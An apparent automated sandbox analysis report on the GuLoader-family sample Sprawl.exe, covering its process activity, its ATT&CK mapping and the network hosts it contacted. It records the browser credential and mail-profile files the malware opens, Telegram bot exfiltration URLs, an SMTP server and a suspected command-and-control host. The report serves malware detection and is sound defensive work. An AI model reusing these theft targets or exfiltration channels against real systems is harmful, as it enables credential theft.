            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeCode function: 0_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D51

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 4460, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3212, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 4460, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3212, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 4460, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3212, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            2
            Obfuscated Files or Information
            1
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            PowerShell
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Software Packing
            LSASS Memory15
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
            Process Injection
            1
            DLL Side-Loading
            Security Account Manager111
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            11
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Masquerading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            1
            Non-Standard Port
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
            Virtualization/Sandbox Evasion
            LSA Secrets21
            Virtualization/Sandbox Evasion
            SSHKeylogging3
            Non-Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Access Token Manipulation
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input Capture24
            Application Layer Protocol
            Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
            Process Injection
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1539387 Sample: Sprawl.exe Startdate: 22/10/2024 Architecture: WINDOWS Score: 100 34 reallyfreegeoip.org 2->34 36 api.telegram.org 2->36 38 5 other IPs or domains 2->38 48 Found malware configuration 2->48 50 Multi AV Scanner detection for dropped file 2->50 52 Multi AV Scanner detection for submitted file 2->52 58 4 other signatures 2->58 8 Sprawl.exe 34 2->8         started        signatures3 54 Tries to detect the country of the analysis system (by using the IP) 34->54 56 Uses the Telegram API (likely for C&C communication) 36->56 process4 file5 28 C:\Users\user\AppData\...\Paraffinerer.Dej, ASCII 8->28 dropped 64 Suspicious powershell command line found 8->64 12 powershell.exe 28 8->12         started        16 powershell.exe 8->16         started        signatures6 process7 file8 30 C:\Users\user\AppData\Roaming\...\Sprawl.exe, PE32 12->30 dropped 32 C:\Users\user\...\Sprawl.exe:Zone.Identifier, ASCII 12->32 dropped 66 Early bird code injection technique detected 12->66 68 Writes to foreign memory regions 12->68 70 Found suspicious powershell code related to unpacking or dynamic code loading 12->70 74 2 other signatures 12->74 18 msiexec.exe 15 8 12->18         started        22 conhost.exe 12->22         started        72 Loading BitLocker PowerShell Module 16->72 24 msiexec.exe 8 16->24         started        26 conhost.exe 16->26         started        signatures9 process10 dnsIp11 40 api.telegram.org 149.154.167.220, 443, 50023, 50025 TELEGRAMRU United Kingdom 18->40 42 smtp.ionos.es 213.165.67.102, 50027, 50028, 587 ONEANDONE-ASBrauerstrasse48DE Germany 18->42 46 3 other IPs or domains 18->46 44 drive.google.com 142.250.184.238, 443, 49986, 49987 GOOGLEUS United States 24->44 60 Tries to steal Mail credentials (via file / registry access) 24->60 62 Tries to harvest and steal browser information (history, passwords, etc) 24->62 signatures12

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Sprawl.exe42%ReversingLabsWin32.Trojan.Guloader
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Agog\Smriti\Sprawl.exe42%ReversingLabsWin32.Trojan.Guloader
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            http://crl.microsoft0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            http://checkip.dyndns.org/0%URL Reputationsafe
            https://aka.ms/pscore6lB0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://apis.google.com0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://nsis.sf.net/NSIS_Error0%URL Reputationsafe
            https://reallyfreegeoip.org0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.184.238
            truefalse
              unknown
              drive.usercontent.google.com
              142.250.185.65
              truefalse
                unknown
                reallyfreegeoip.org
                188.114.97.3
                truetrue
                  unknown
                  smtp.ionos.es
                  213.165.67.102
                  truetrue
                    unknown
                    api.telegram.org
                    149.154.167.220
                    truetrue
                      unknown
                      checkip.dyndns.com
                      193.122.6.168
                      truefalse
                        unknown
                        checkip.dyndns.org
                        unknown
                        unknowntrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2023/10/2024%20/%2001:23:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            unknown
                            https://reallyfreegeoip.org/xml/173.254.250.76false
                              unknown
                              http://checkip.dyndns.org/false
                              • URL Reputation: safe
                              unknown
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2023/10/2024%20/%2001:23:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://reallyfreegeoip.org/xml/173.254.250.76$msiexec.exe, 00000008.00000002.3378029055.0000000021EAC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000021ED5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000021E67000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229F5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229CC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022987000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://duckduckgo.com/chrome_newtabmsiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://duckduckgo.com/ac/?q=msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.telegram.orgmsiexec.exe, 00000008.00000002.3378029055.0000000021ED5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://api.telegram.org/botmsiexec.exe, 00000008.00000002.3378029055.0000000021ED5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      http://crl.microsoftpowershell.exe, 00000004.00000002.2786466269.00000000078E5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2786466269.000000000792C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://contoso.com/Licensepowershell.exe, 00000004.00000002.2766047897.00000000063D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://www.office.com/lBmsiexec.exe, 00000008.00000002.3378029055.0000000021FB1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://smtp.ionos.esmsiexec.exe, 00000008.00000002.3378029055.0000000021FF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://chrome.google.com/webstore?hl=enmsiexec.exe, 00000009.00000002.3378186894.0000000022AA6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022AD7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022A97000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            http://varders.kozow.com:8081msiexec.exe, 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://drive.gomsiexec.exe, 00000009.00000002.3362946153.0000000006F90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                unknown
                                                https://www.google.commsiexec.exe, 00000008.00000003.2935707844.00000000065F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2936201345.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.3006706894.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2725870722.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2754100744.0000000005371000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://drive.google.com/msiexec.exe, 00000008.00000002.3362918549.000000000657A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.000000000704A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
